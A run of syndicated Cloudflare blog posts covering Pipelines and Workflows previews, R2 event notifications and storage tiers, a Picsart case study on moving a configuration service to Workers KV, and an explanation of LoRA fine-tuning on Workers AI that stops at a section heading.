$ wrangler pipelines create clickstream-ingest-prod --batch-size="1MB" --batch-timeout-secs=120 --batch-on-json-key=".merchantId" --destination-bucket="prod-cs-data"

✅ Successfully created new pipeline "clickstream-ingest-prod"
📥 Created endpoints:
➡ HTTPS: https://d458dbe698b8eef41837f941d73bc5b3.pipelines.cloudflarestorage.com/clickstream-ingest-prod
➡ WebSocket: wss://d458dbe698b8eef41837f941d73bc5b3.pipelines.cloudflarestorage.com:8443/clickstream-ingest-prod
➡ Kafka: d458dbe698b8eef41837f941d73bc5b3.pipelines.cloudflarestorage.com:9092 (topic: clickstream-ingest-prod)

As you can see here, we’re already thinking about how to make Pipelines protocol-agnostic: write from a HTTP client, stream events over a WebSocket, and/or redirect your existing Kafka producer (and stop having to manage and scale Kafka) directly to Pipelines.

But that’s just the beginning of our vision here. Scalable ingestion and simple batching is one thing, but what about if you have more complex needs? Well, we have a massively scalable compute platform (Cloudflare Workers) that can help address this too.

The code below is just an initial exploration for how we’re thinking about an API for running transforms over streaming data. If you’re aware of projects like Apache Beam or Flink, this programming model might even look familiar:

export default {    
   // Pipeline handler is invoked when batch criteria are met
   async pipeline(stream: StreamPipeline, env: Env, ctx: ExecutionContext): Promise<StreamingPipeline> {
      // ...
      return stream
         // Type: transform(label: string, transformFunc: TransformFunction): Promise<StreamPipeline>
         // Each transform has a label that is used in metrics to provide
    // per-transform observability and debugging
         .transform("human readable label", (events: Array<StreamEvent>) => {
            return events.map((e) => ...)
         .transform("another transform", (events: Array<StreamEvent>) => {
            return events.map((e) => ...)
            format: "json",
            bucket: "MY_BUCKET_NAME",
            prefix: somePrefix,
            batchSize: "10MB"


  • The Worker describes a pipeline of transformations (mapping, reducing, filtering) that operates over each subset of events (records)
  • You can call out to other services — including D1 or KV — in order to synchronously or asynchronously hydrate data or lookup values during your stream processing
  • We take care of scaling horizontally based on records-per-second and/or any concurrency settings you configure based on processing latency requirements.

We’ll be bringing Pipelines into open beta later in 2024, and it will initially launch with support for HTTP ingestion and R2 as a destination (sink), but we’re already thinking bigger.

We’ll be sharing more as Pipelines gets closer to release. In the meantime, you can register your interest and share your use-case, and we’ll reach out when Pipelines reaches open beta.

Durable Execution

If the term “Durable Execution” is new to you, don’t worry: the term comes from the desire to run applications that can resume execution from where they left off, even if the underlying host or compute fails (where the “durable” part comes from).

As we’ve continued to build out our data and AI platforms, we’ve been acutely aware that developers need ways to create reliable, repeatable workflows that operate over that data, turn unstructured data into structured data, trigger on fresh data (or periodically), and automatically retry, restart, and export metrics for each step along the way. The industry calls this Durable Execution: we’re just calling it Workflows.

What makes Workflows different from other takes on Durable Execution is that we provide the underlying compute as part of the platform. You don’t have to bring-your-own compute, or worry about scaling it or provisioning it in the right locations. Workflows runs on top of Cloudflare Workers – you write the workflow, and we take care of the rest.

Here’s an early example of writing a Workflow that generates text embeddings using Workers AI and stores them (ready to query) in Vectorize as new content is written to (or updated within) R2.

  • Each Workflow run is triggered by an Event Notification consumed from a Queue, but could also be triggered by a HTTP request, another Worker, or even scheduled on a timer.
  • Individual steps within the Workflow allow us to define individually retriable units of work: in this case, we’re reading the new objects from R2, creating text embeddings using Workers AI, and then inserting.
  • State is durably persisted between steps: each step can emit state, and Workflows will automatically persist that so that any underlying failures, uncaught exceptions or network retries can resume execution from the last successful step.
  • Every call to step() automatically emits metrics associated with the unique Workflow run, making it easier to debug within each step and/or break down your application into its smallest units of execution, without having to worry about observability.

Step-by-step, it looks like this:

Transforming this series of steps into real code, here’s what this would look like with Workflows:

import { Ai } from "@cloudflare/ai";
import { Workflow } from "cloudflare:workers";

export interface Env {
  R2: R2Bucket;
  AI: any;
  VECTOR_INDEX: VectorizeIndex;

export default class extends Workflow {
  async run(event: Event) {
    const ai = new Ai(this.env.AI);

    // List of keys to fetch from our incoming event notification
    const keysToFetch = event.messages.map((val) => {
      return val.object.key;

    // The return value of each step is stored (the "durable" part
    // of "durable execution")
    // This ensures that state can be persisted between steps, reducing
    // the need to recompute results ($$, time) should subsequent
    // steps fail.
    const inputs = await this.ctx.run(
      // Each step has a user-defined label
      // Metrics are emitted as each step runs (to success or failure)
// with this label attached and available within per-Workflow
// analytics in near-real-time.
"read objects from R2", async () => {
      const objects = [];

      for (const key of keysToFetch) {
        const object = await this.env.R2.get(key);
        objects.push(await object.text());

      return objects;

    // Persist the output of this step.
    const embeddings = await this.ctx.run(
      "generate embeddings",
      async () => {
        const { data } = await ai.run("@cf/baai/bge-small-en-v1.5", {
          text: inputs,

        if (data.length) {
          return data;
        } else {
          // Uncaught exceptions trigger an automatic retry of the step
          // Retries and timeouts have sane defaults and can be overridden
    // per step
          throw new Error("Failed to generate embeddings");
        retries: {
          limit: 5,
          delayMs: 1000,
          backoff: "exponential",

    await this.ctx.run("insert vectors", async () => {
      const vectors = [];

      keysToFetch.forEach((key, index) => {
          id: crypto.randomUUID(),
          // Our embeddings from the previous step
          values: embeddings[index].values, 
          // The path to each R2 object to map back to during
 	    // vector search
          metadata: { r2Path: key },

      return this.env.VECTOR_INDEX.upsert();

This is just one example of what a Workflow can do. The ability to durably execute an application, modeled as a series of steps, applies to a wide number of domains. You can apply this model of execution to a number of use-cases, including:

  • Deploying software: each step can define a build step and subsequent health check, gating further progress until your deployment meets your criteria for “healthy”.
  • Post-processing user data: triggering a workflow based on user uploads (e.g. to Cloudflare R2) that then subsequently parses that data asynchronously, redacts PII or sensitive data, writes the sanitized output, and triggers a notification via email, webhook, or mobile push.
  • Payment and batch workflows: aggregating raw customer usage data on a periodic schedule by querying your data warehouse (or Workers Analytics Engine), triggering usage or spend alerts, and/or generating PDF invoices.

Each of these use cases model tasks that you want to run to completion, minimize redundant retries by persisting intermediate state, and (importantly) easily observe success and failure.

We’ll be sharing more about Workflows during the second quarter of 2024 as we work towards an open (public!) beta. This includes how we’re thinking about idempotency and interactions with our storage, per-instance observability and metrics, local development, and templates to bootstrap common workflows.

Putting it together

We’ve often thought of Cloudflare’s own network as one massively scalable parallel data processing cluster: data centers in 310+ cities, with the ability to run compute close to users and/or close to data, keep it within the bounds of regulatory or compliance requirements, and most importantly, use our massive scale to enable our customers to scale as well.

Recapping, a fully-fledged data platform needs to enable three things:

  1. Ingesting data: getting data into the platform (in the right format, from the right sources)
  2. Storing data: securely, reliably, and durably.
  3. Querying data: understanding and extracting insights from the data, and/or transforming it for use by other tools.

When we launched R2 we tackled the second part, but knew that we’d need to follow up with the first and third parts in order to make it easier for developers to get data in and make use of it.

If we look at how we can build a system that helps us solve each of these three parts together with Pipelines, Event Notifications, R2, and Workflows, we end up with an architecture that resembles this:

Specifically, we have Pipelines (1) scaling out to ingest data, batch it, filter it, and then durably store it in R2 (2) in a format that’s ready and optimized for querying. Workflows, ClickHouse, Databricks, or the query engine of your choice can then query (3) that data as soon as it’s ready — with “ready” being automatically triggered by an Event Notification as soon as the data is ingested and written to R2.

There’s no need to poll, no need to batch after the fact, no need to have your query engine slow down on data that wasn’t pre-aggregated or filtered, and no need to manage and scale infrastructure in order to keep up with load or data jurisdiction requirements. Create a Pipeline, write your data directly to R2, and query directly from it.

If you’re also looking at this and wondering about the costs of moving this data around, then we’re holding to one important principle: zero egress fees across all of our data products. Just as we set the stage for this with our R2 object storage, we intend to apply this to every data product we’re building, Pipelines included.

Start Building

We’ve shared a lot of what we’re building so that developers have an opportunity to provide feedback (including via our Developer Discord), share use-cases, and think about how to build their next application on Cloudflare.

R2 adds event notifications, support for migrations from Google Cloud Storage, and an infrequent access storage tier

Post Syndicated from Matt DeBoard original https://blog.cloudflare.com/r2-events-gcs-migration-infrequent-access

We’re excited to announce three new features for Cloudflare R2, our zero egress fee object storage platform:

Event Notifications Open Beta

The lifecycle of data often doesn’t stop immediately after upload to an R2 bucket – event data may need to be transformed and loaded into a data warehouse, media files may need to go through a post-processing step, etc. We’re releasing event notifications for R2 in open beta to enable building applications and workflows driven by your changing data.

Event notifications work by sending messages to your queue each time there is a change to your data. These messages are then received by a consumer Worker where you can then define any subsequent action that needs to be taken.

To get started enabling event notifications on your R2 bucket, you can run the following Wrangler command (replacing bucket_name and queue_name with your bucket and queue names respectively):

wrangler r2 bucket notification create <bucket_name> --event-type object-create --queue <queue_name>

For more information on how to set up event notifications on your R2 buckets today and limitations during beta, please refer to the documentation.

Super Slurper for Google Cloud Storage

Super Slurper can now migrate data from Google Cloud Storage (GCS) to Cloudflare R2. We released Super Slurper last year with the goal of making one-time comprehensive data migrations fast, reliable, and easy: there’s no need to spin up migration VMs and implement complicated retry logic. Since then, thousands of developers have used Super Slurper to migrate petabytes of data from AWS S3 to R2. Now Google Cloud Storage customers can migrate data to Cloudflare R2 to benefit from Cloudflare’s zero egress fees, whether you are permanently moving data to another provider or not.

To get started migrating data from GCS:

  1. From the Cloudflare dashboard, select R2 > Data Migration.
  2. Select Migrate files.
  3. Select Google Cloud Storage for the source bucket provider.
  4. Enter your bucket name and associated credentials and select Next.
  5. Enter your R2 bucket name and associated credentials and select Next.
  6. After you finish reviewing the details of your migration, select Migrate files.

You can view the status of your migration job at any time on the dashboard. For more information on how to use Super Slurper, please refer to the documentation here.

Infrequent Access Private Beta

We’re excited to introduce the private beta of our new Infrequent Access storage class. For use cases that involve data that isn’t frequently accessed (long tail user-generated content, logs, etc), Infrequent Access gives you the ability to pay less for storage while maintaining performance and durability.

Here’s an example of how you can upload an object to your R2 bucket with the new Infrequent Access storage class using Workers:

# wrangler.toml
binding = 'MY_BUCKET'
bucket_name = '<YOUR_BUCKET_NAME>'

# index.ts
export default {
   async fetch(request: Request, env: Env): Promise<Response> {
      if (request.method === "PUT") {
         await env.MY_BUCKET.put("myobject", request.body, storageClass: "InfrequentAccess");
         return new Response("Put object successfully!");
      return new Response("Not a PUT!");

In addition to uploading objects directly to Infrequent Access, you can define an object lifecycle policy to move data to Infrequent Access after a period of time goes by and you no longer need to access your data as often. In the future, we plan to automatically optimize storage classes for data so you can avoid manually creating rules and better adapt to changing data access patterns.

For data stored in the Infrequent Access storage class, the pricing components will be similar to what you’re used to with R2: storage, Class A operations (writes, lists), Class B operations (reads), and data retrieval (processing). Data retrieval is charged per GB when data in the Infrequent Access storage class is retrieved and is what allows us to provide storage at a lower price. It reflects the additional computational resources required to fetch data from underlying storage optimized for less frequent access. And when the time comes, and you do need to use your data, there are still no egress fees.

Component Price
Storage $0.01 / GB-month
Class A Operations $9.00 / million requests
Class B Operations $0.90 / million requests
Data Retrieval (Processing) $0.01 / GB
Egress (or Data Transfer) $0 – No Charge

Are you interested in participating in the private beta for Infrequent Access?

Join the private beta waitlist to get access.

Have any feedback?

We would love to hear from you! To share your feedback about R2 and our data migration services, please join the Cloudflare Developer Discord. If you’re interested in learning more about R2, get started by visiting R2’s developer documentation or see how much you could save with our pricing calculator.

How Picsart leverages Cloudflare’s Developer Platform to build globally performant services

Post Syndicated from Mark Dembo original https://blog.cloudflare.com/picsart-move-to-workers-huge-performance-gains

Delivering great user experiences with a global user base can be challenging. While serving requests quickly when you start out in a local market is straightforward, doing so for a global audience is much more difficult. Why? Even under optimal conditions, you cannot be faster than the speed of light, which brings single data center solutions to their performance limits.

In this post, we will cover how Picsart improved the performance of one of its most critical services by moving from a centralized architecture to a globally distributed service built on Cloudflare. Our serverless compute platform, Workers, distributed throughout 310+ cities around the world, and our globally distributed Workers KV storage allowed them to improve their performance significantly and drive real business impact.

Success driven by data-driven insights

Picsart is one of the world’s largest digital creation platforms and a long-standing Cloudflare partner. At its core, an advanced tech stack powers its comprehensive features, including AI-driven photo and video editing tools and community-driven content sharing. With its infrastructure spanning across multiple cloud environments and on-prem deployments, Picsart is engineered to handle billions of daily requests from its huge mobile and web user base and API integrations. For over a decade, Cloudflare has been integral to Picsart, providing support for performant content delivery and securing its digital ecosystem.  

Similar to many other tech giants, Picsart approaches product development in a data-driven way. At the core of the innovation is Picsart’s remote configuration and experimentation platform, which enables product managers, UX researchers, and others to segment their user base into different test groups. These test groups might get to see slightly different implementations of features or designs of the Picsart app. Users might also get early access to experimental features or see different in-app promotions. In combination with constant monitoring of relevant KPIs, this allows for informed product decisions based on user preference and business impact.

On each app start, the client device sends a request to the remote configuration service for the latest setup tailored to the user’s session. The assignment of experiments relies on factors like the operating system and previous sessions, making each request unique and uncachable. Picsart’s app showcases extensive remote configuration capabilities, enabling adjustments to nearly every element. This results in a response containing a 1.5 MB configuration file for mobile clients. While the long-term solution is to reduce the file size, which has grown over time as more teams adopted the powerful service, this is not possible in the near or mid-term as it requires a major rewrite of all clients.

This setup request is blocking in the “hot path” during app start, as the results of this request will decide how the app itself looks and behaves. Hence, performance is critical. To ensure users are not waiting for too long, Picsart apps will wait for 1500ms on mobile for the request to complete – if it does not, the user will not be assigned a test group and the app will fallback to default settings.

The clock is ticking

While a 1500ms round trip time seems like a sufficiently large time budget, the data suggested otherwise. Before the improvements were implemented, a staggering 50% of devices could not complete the requests in time. How come? In these 1.5 seconds the following steps need to complete:

  1. The request must travel from the users’ devices to the centralized backend servers
  2. The server processes the request based on dozens of user attributes provided in the request and thousands of defined remote configuration variations, running experiments, and segments metadata. Using all the info, the server selects the right variation of each remote setting entry and builds the response payload.
  3. The response must travel from the centralized backend servers to the user devices.

Looking at the data, it was clear to the Picsart team that their backend service was already well-optimized, taking only 30 milliseconds, a tiny fraction of the available time budget, to process each of the billions of monthly requests. The bulk of the request time came from network latency. Especially with mobile devices, last mile performance can be very volatile, eating away a significant amount of the available time budget. Not only that, but the data was clear: users closer to the origin server had a much higher chance of making the round trip in time versus users out of region. It quickly became obvious that Picsart, fueled by its global success, had outgrown a single-region setup.

To the drawing board

A solution that comes to mind would be to replicate the existing cloud infrastructure in multiple regions and use global load balancing to minimize the distance a request needs to travel. However, this introduces significant overhead and cost. On the infrastructure side, it is not only the additional compute instances and database clusters that incur cost, but also cross-region data transfer to keep data in sync. Moreover, technical teams would need to operate and monitor infrastructure in multiple regions, which can add a lot to the complexity and cognitive load, leading to decreased development velocity and productivity loss.

Picsart instead looked to Cloudflare – we already had a long-lasting relationship for Application Performance and Security, and they aimed to use our Developer Platform to tackle the problem.

Workers and Workers KV seemed like the ideal solution. Both compute and data are globally distributed in 310+ locations around the world, resulting in a shorter distance between end users and the experimentation service. Not only that, but Cloudflare’s global-by-default approach allows for deployment with minimal overhead, and in contrast to other considered solutions, no additional fees to distribute the data around the globe.

No race without a clock

The objective for the refactor of the experimentation service was to increase the share of devices that successfully receive experimentation configuration within the set time budget.

But how to measure success? While synthetic testing can be useful in many situations, Picsart opted to come up with another clever solution:

During development, the Picsart engineers had already added a testing endpoint to the web and mobile versions of their app that sends a duplicate request to the new endpoint, discarding the response and swallowing all potential errors. This allows them to collect timing data based on real-user metrics without impacting the app’s performance and reliability.

A simplified version of this pattern for a web client could look like this:

// API endpoint URLs
const prodUrl = 'https://prod.example.com/';
const devUrl = 'https://new.example.com/';

// Function to collect metrics
const collectMetrics = (duration) => {
    console.log('Request duration:', duration);
    // …

// Function to fetch data from an endpoint and call collectMetrics
const fetchData = async (url, options) => {
    const startTime = performance.now();
    try {
        const response = await fetch(url, options);
        const endTime = performance.now();
        const duration = endTime - startTime;
        return await response.json();
    } catch (error) {
        console.error('Error fetching data:', error);

// Fetching data from both endpoints
async function fetchDataFromBothEndpoints() {
    try {
        const result1 = await fetchData(prodUrl, { method: 'POST', ... });
        console.log('Result from endpoint 1:', result1);

        // Fetching data from the second endpoint without awaiting its completion
        fetchData(devUrl, { method: 'POST', ... });
    } catch (error) {
        console.error('Error fetching data from both endpoints:', error);


Using existing data analytics tools, Picsart was able to analyze the performance of the new services from day one, starting with a dummy endpoint and a ‘hello world’ response. And with that a v0 was created that did not have the correct logic just yet, but simulated reading multiple values from KV and returning a response of a realistic size back to the end user.

The need for a do-over

In the initial phase, outcomes fell short of expectations. Surprisingly, requests were slower despite the service’s proximity to end users. What caused this setback?  Subsequent investigation unveiled multiple culprits and design patterns in need for optimization.

Data segmentation

The previous, stateful solution operated on a single massive “blob” of data exceeding 100MB in value. Loading this into memory incurred a few seconds of initial startup time, but once the VM completed the task, request handling was fast, benefiting from the readily available data in memory.

However, this approach doesn’t seamlessly transition to the serverless realm. Unlike long-running VMs, Worker isolates have short lifespans. Repeatedly parsing large JSON objects led to prolonged compute durations. Simply parsing four KV entries of 25MB each (KV maximum value size is 25MB) on each request was not a feasible option.

The Picsart team went back to solution design and embarked on a journey to optimize their system’s execution time, resulting in a series of impactful improvements.

The fundamental insight that guided the solution was the unnecessary overhead that was involved in loading and parsing data irrelevant to the user’s specific context. The 100MB configuration file contained configurations for all platforms and locations worldwide – a setup that was far from efficient in a globally distributed, serverless compute environment. For instance, when processing requests from users in the United States, there was no need to fetch configurations targeted for users in other countries, or for different platforms.

To address this inefficiency, the Picsart team stored the configuration of each platform and country in separate KV records. This targeted strategy meant that for a request originating from a US user on an Android device, our system would only fetch and parse the KV record specific to Android users in the US, thereby excluding all irrelevant data. This resulted in approximately 600 KV records, each with a maximum size of 10MB. While this leads to data duplication on the KV storage side, it decreases the amount of data that needs to be parsed upon request. As Cloudflare operates in over 120 countries around the world, only a subset of records were needed in each location. Hence, the increase in cardinality had minimal impact on KV cache performance, as demonstrated by more than 99.5% of KV reads being served from local cache.

Key Size
settings_part1.json 25MB
settings_part2.json 25MB

Before (simplified)

Key Size
com.picsart.studio_apple_us.json 6.1MB
com.picsart.studio_apple_de.json 6.1MB
com.picsart.studio_android_us.json 5.9MB

After (simplified)

This approach was a significant move for Picsart as they transitioned from a regional cloud setup to Cloudflare’s globally distributed connectivity cloud. By serving data from close proximity to end user locations, they were able to combat the high network latency from their previous setup. This strategy radically transformed the data-handling process. which unlocked two major benefits:

  • Performance Gains: By ensuring that only the relevant subset of data is fetched and parsed based on the user’s platform and geographical location, wall time and compute resources required for these operations could be significantly reduced.
  • Scalability and Flexibility: the granular segmentation of data enables effortless scaling of the service for new features or regional content. Adding support for new applications now only requires inserting new, standalone KV records in contrast to the previous solution where this would require increasing the size of the single record.

Immutable updates

Now that changes to the configuration were segmented by app, country, and platform, this also allowed for individual updates of the configuration in KV. KV storage showcases its best performance when records are updated infrequently but read very often. This pattern leverages KV’s fundamental design to cache values at edge locations upon reads, ensuring that subsequent queries for the same record are swiftly served by local caches rather than requiring a trip back to KV’s centralized data centers. This architecture is fundamental for minimizing latency and maximizing the speed of data retrieval across a globally distributed platform.

A crucial requirement for Picsart’s experimentation system was the ability to propagate updates of remote configuration values immediately. Updating existing records would require very short cache TTLs and even the minimum KV cache TTL of 60 seconds was considered unacceptable for the dynamic nature of the feature flagging. Moreover, setting short TTLs also impacts the cache hit ratio and the overall KV performance, specifically in regions with low traffic.

To reconcile the need for both rapid updates and efficient caching, Picsart adopted an innovative approach: making KV records immutable. Instead of modifying existing records, they opted to create new records with each configuration change. By appending the content hash to the KV key and writing new records after each update, Picsart ensured that each record was unique and immutable. This allowed them to leverage higher cache TTLs, as these records would never be updated.

Key Size
com.picsart.studio_apple_us.json 60s

Before (simplified)

Key Size
com.picsart.studio_apple_us_b58b59.json 86400s
com.picsart.studio_apple_us_273678.json 86400s

After (simplified)

There was a catch, though. The service must now keep track of the correct KV keys to use. The Picsart team addressed this challenge by storing references to the latest KV keys in the environment variables of the Worker.

Each configuration change triggers a new KV pair to be written and the services’ environment variables to be updated. As global Workers deployments take mere seconds, changes to the experimentation and configuration data are near-instantaneously globally available.

JSON serialization & alternatives

Following the previous improvements, the Picsart team made another significant discovery: only a small fraction of configuration data is needed to assign the experiments, while the remaining majority of the data comprises JSON values for the remote configuration payloads. While the service must deliver the latter in the response, the data is not required during the initial processing phase.

The initial implementation used KV’s get() method to retrieve the configuration data with the parameter type=json, which converts the KV value to an object. This process is very compute-intensive compared to using the get() method with parameter type= text, which simply returns the value as a string. In the context of Picsart’s data, the bulk of the CPU cycles were wasted on serializing JSON data that is not needed to perform the required business logic.

What if the data structure and code could be changed in such a way that only the data needed to assign experiments was parsed as JSON, while the configuration values were treated as text? Picsart went ahead with a new approach: splitting the KV records into two, creating a small 300KB record for the metadata, which can be quickly parsed to an object, and a 9.7MB record of configuration values. The extracted configuration values are delimited by newline characters. The respective line number is used as reference in the metadata entry, so that the respective configuration value for an experiment can be merged back into the payload response later.

  "name": "shape_replace_items",
  "default_value": "<large json object>",
  "segments": [
      "id": "f1244",
      "value": "<Another json object
json object>"
      "id": "a2lfd",
      "value": "<Yet another large json
Before: Metadata and Values in one JSON object (simplified)

// com.picsart.studio_apple_am_metadata

1 {
2   "name": "shape_replace_items",
3   "default_value": 1,
4   "segments": [
5     {
6       "id": "f1244",
7       "value": 2
8     },
9     {
10       "id": "a2lfd",
11      "value": 3
12     }
13   ]
14 }

// com.picsart.studio_apple_am_values

1 "<large json object>"
2 "<Another json object>"
3 "<Yet another json object>"

After: Metadata and Values are split (simplified)

After calculating the experiments and selecting the correct variants based solely on the small metadata entry, the service constructs a JSON string for the response containing placeholders for the actual values that reference the corresponding line numbers in the separate text file. To finalize the response, the server replaces the placeholders with the corresponding serialized JSON strings from the text file. This approach circumvents the need for parsing and re-serializing large JSON objects and helps to avoid a significant computational overhead.

Note that the process of parsing the metadata JSON and determining the correct experiments as well as the loading of the large file with configuration values are executed in parallel, saving additional milliseconds.

By minimizing the size of the JSON data that needed to be parsed and leveraging a more efficient method for constructing the final response, the Picsart team managed to not only reduce the response times but also optimize the compute resource usage. This approach reflects a broader principle applicable across the tech industry: that efficiency, particularly in serverless architectures, can often be dramatically improved by rethinking data structure and utilization.

Getting a head start

The changes on the server-side, moving from a single region setup to Cloudflare’s global architecture, paid off massively. Median response times globally dropped by more than 1 second, which was already a huge improvement for the team. However, in looking at the new data, two more paths for client-side optimizations were found.

As the web and mobile app would call the service at startup, most of the time no active connections to the servers were alive and establishing that connection at request time costs valuable milliseconds.

For the web version, setting a pre-connect header on initial page load showed a positive impact. For the mobile app version, the Picsart team took it a step further. Investigation showed that before the connection could be established, three modules had to complete initialization: the error tracker, the HTTP client, and the SDK. Reordering of the modules to initialize the HTTP client first allowed for connection establishment in parallel to the initialization of the SDK and error tracker, again saving time. This resulted in another 200ms improvement for end users.

Setting a new personal best

The day had come and it was time for the phased rollout, web first and the mobile apps second. With suspense, the team looked at the dashboards, and were pleasantly surprised. The rollout was successful and billions of requests were handled with ease.

Share of successfully delivered experiments

The result? The Picsart apps are loading faster than ever for millions of users worldwide, while the share of successfully delivered experiments increased from 50% to 85%. Median response time dropped from 1500 ms to 280 ms. The response time dropped to 70 ms on the web since the response size is smaller compared to mobile. This translates to a real business impact for Picsart as they can now deliver more personalized and data-driven experiences to even more of their users.

A bright future ahead

Picsart is already thinking of the next generation of experimentation. To integrate with Cloudflare even further, the plan is to use Durable Objects to store hundreds of millions of user data records in a decentralized fashion, enabling even more powerful experiments without impacting performance. This is possible thanks to Durable Objects’ underlying architecture that stores the user data in-region, close to the respective end user device.

Beyond that, Picsart’s experimentation team is also planning to onboard external B2B customers to their experimentation platform as Cloudflare’s developer platform provides them with the scale and global network to handle more traffic and data with ease.

Get started yourself

If you’re also working on or with an application that would benefit from Cloudflare’s speed and scale, check out our developer documentation and tutorials, and join our developer Discord to get community support and inspiration.

Running fine-tuned models on Workers AI with LoRAs

Post Syndicated from Michelle Chen original https://blog.cloudflare.com/fine-tuned-inference-with-loras

Inference from fine-tuned LLMs with LoRAs is now in open beta

Today, we’re excited to announce that you can now run fine-tuned inference with LoRAs on Workers AI. This feature is in open beta and available for pre-trained LoRA adapters to be used with Mistral, Gemma, or Llama 2, with some limitations. Take a look at our product announcements blog post to get a high-level overview of our Bring Your Own (BYO) LoRAs feature.

In this post, we’ll do a deep dive into what fine-tuning and LoRAs are, show you how to use it on our Workers AI platform, and then delve into the technical details of how we implemented it on our platform.

What is fine-tuning?

Fine-tuning is a general term for modifying an AI model by continuing to train it with additional data. The goal of fine-tuning is to increase the probability that a generation is similar to your dataset. Training a model from scratch is not practical for many use cases given how expensive and time consuming they can be to train. By fine-tuning an existing pre-trained model, you benefit from its capabilities while also accomplishing your desired task. Low-Rank Adaptation (LoRA) is a specific fine-tuning method that can be applied to various model architectures, not just LLMs. It is common that the pre-trained model weights are directly modified or fused with additional fine-tune weights in traditional fine-tuning methods. LoRA, on the other hand, allows for the fine-tune weights and pre-trained model to remain separate, and for the pre-trained model to remain unchanged. The end result is that you can train models to be more accurate  at specific tasks, such as generating code, having a specific personality, or generating images in a specific style. You can even fine-tune an existing LLM to understand additional information about a specific topic.

The approach of maintaining the original base model weights means that you can create new fine-tune weights with relatively little compute. You can take advantage of existing foundational models (such as Llama, Mistral, and Gemma), and adapt them for your needs.

How does fine-tuning work?

To better understand fine-tuning and why LoRA is so effective, we have to take a step back to understand how AI models work. AI models (like LLMs) are neural networks that are trained through deep learning techniques. In neural networks, there are a set of parameters that act as a mathematical representation of the model’s domain knowledge, made up of weights and biases – in simple terms, numbers. These parameters are usually represented as large matrices of numbers. The more parameters a model has, the larger the model is, so when you see models like llama-2-7b, you can read “7b” and know that the model has 7 billion parameters.

A model’s parameters define its behavior. When you train a model from scratch, these parameters usually start off as random numbers. As you train the model on a dataset, these parameters get adjusted bit-by-bit until the model reflects the dataset and exhibits the right behavior. Some parameters will be more important than others, so we apply a weight and use it to show more or less importance. Weights play a crucial role in the model’s ability to capture patterns and relationships in the data it is trained on.

Traditional fine-tuning will adjust all the parameters in the trained model with a new set of weights. As such, a fine-tuned model requires us to serve the same amount of parameters as the original model, which means it can take a lot of time and compute to train and run inference for a fully fine-tuned model. On top of that, new state-of-the-art models, or versions of existing models, are regularly released, meaning that fully fine-tuned models can become costly to train, maintain, and store.

LoRA is an efficient method of fine-tuning

In the simplest terms, LoRA avoids adjusting parameters in a pre-trained model and instead allows us to apply a small number of additional parameters. These additional parameters are applied temporarily to the base model to effectively control model behavior. Relative to traditional fine-tuning methods it takes a lot less time and compute to train these additional parameters, which are referred to as a LoRA adapter. After training, we package up the LoRA adapter as a separate model file that can then plug in to the base model it was trained from. A fully fine-tuned model can be tens of gigabytes in size, while these adapters are usually just a few megabytes. This makes it a lot easier to distribute, and serving fine-tuned inference with LoRA only adds ms of latency to total inference time.

If you’re curious to understand why LoRA is so effective, buckle up — we first have to go through a brief lesson on linear algebra. If that’s not a term you’ve thought about since university, don’t worry, we’ll walk you through it.

Show me the math

With traditional fine-tuning, we can take the weights of a model (W0) and tweak them to output a new set of weights — so the difference between the original model weights and the new weights is ΔW, representing the change in weights. Therefore, a tuned model will have a new set of weights which can be represented as the original model weights plus the change in weights, W0 + ΔW.

Remember, all of these model weights are actually represented as large matrices of numbers. In math, every matrix has a property called rank (r), which describes the number of linearly independent columns or rows in a matrix. When matrices are low-rank, they have only a few columns or rows that are “important”, so we can actually decompose or split them into two smaller matrices with the most important parameters  (think of it like factoring in algebra). This technique is called rank decomposition, which allows us to greatly reduce and simplify matrices while keeping the most important bits. In the context of fine-tuning, rank determines how many parameters get changed from the original model – the higher the rank, the stronger the fine-tune, giving you more granularity over the output.

According to the original LoRA paper, researchers have found that when a model is low-rank, the matrix representing the change in weights is also low-rank. Therefore, we can apply rank decomposition to our matrix representing the change in weights ΔW to create two smaller matrices A, B, where ΔW = BA. Now, the change in the model can be represented by two smaller low-rank matrices. This is why this method of fine-tuning is called Low-Rank Adaptation.

When we run inference, we only need the smaller matrices A, B to change the behavior of the model. The model weights in A, B constitute our LoRA adapter (along with a config file). At runtime, we add the model weights together, combining the original model (W0) and the LoRA adapter (A, B). Adding and subtracting are simple mathematical operations, meaning that we can quickly swap out different LoRA adapters by adding and subtracting A, B from W0.. By temporarily adjusting the weights of the original model, we modify the model’s behavior and output and as a result, we get fine-tuned inference with minimal added latency.

According to the original LoRA paper, “LoRA can reduce the number of trainable parameters by 10,000 times and the GPU memory requirement by 3 times”. Because of this, LoRA is one of the most popular methods of fine-tuning since it’s a lot less computationally expensive than a fully fine-tuned model, doesn’t add any material inference time, and is much smaller and portable.

How can you use LoRAs with Workers AI?

Workers AI is very well-suited to run LoRAs because of the way we run serverless inference. The models in our catalog are always pre-loaded on our GPUs, meaning that we keep them warm so that your requests never encounter a cold start. This means that the base model is always available, and we can dynamically load and swap out LoRA adapters as needed. We can actually plug in multiple LoRA adapters to one base model, so we can serve multiple different fine-tuned inference requests at once.

When you fine-tune with LoRA, your output will be two files: your custom model weights (in safetensors format) and an adapter config file (in json format). To create these weights yourself, you can train a LoRA on your own data using the Hugging Face PEFT (Parameter-Efficient Fine-Tuning) library combined with the Hugging Face AutoTrain LLM library. You can also run your training tasks on services such as Auto Train and Google Colab. Alternatively, there are many open-source LoRA adapters available on Hugging Face today that cover a variety of use cases.

Eventually, we want to support the LoRA training workloads on our platform, but we’ll need you to bring your trained LoRA adapters to Workers AI today, which is why we’re calling this feature Bring Your Own (BYO) LoRAs.

For the initial open beta release, we are allowing people to use LoRAs with our Mistral, Llama, and Gemma models. We have set aside versions of these models which accept LoRAs, which you can access by appending -lora to the end of the model name. Your adapter must have been fine-tuned from one of our supported base models listed below:

  • @cf/meta-llama/llama-2-7b-chat-hf-lora
  • @cf/mistral/mistral-7b-instruct-v0.2-lora
  • @cf/google/gemma-2b-it-lora
  • @cf/google/gemma-7b-it-lora

As we are launching this feature in open beta, we have some limitations today to take note of: quantized LoRA models are not yet supported, LoRA adapters must be smaller than 100MB and have up to a max rank of 8, and you can try up to 30 LoRAs per account during our initial open beta. To get started with LoRAs on Workers AI, read the Developer Docs.

As always, we expect people to use Workers AI and our new BYO LoRA feature with our Terms of Service in mind, including any model-specific restrictions on use contained in the models’ license terms.

How did we build multi-tenant LoRA serving?

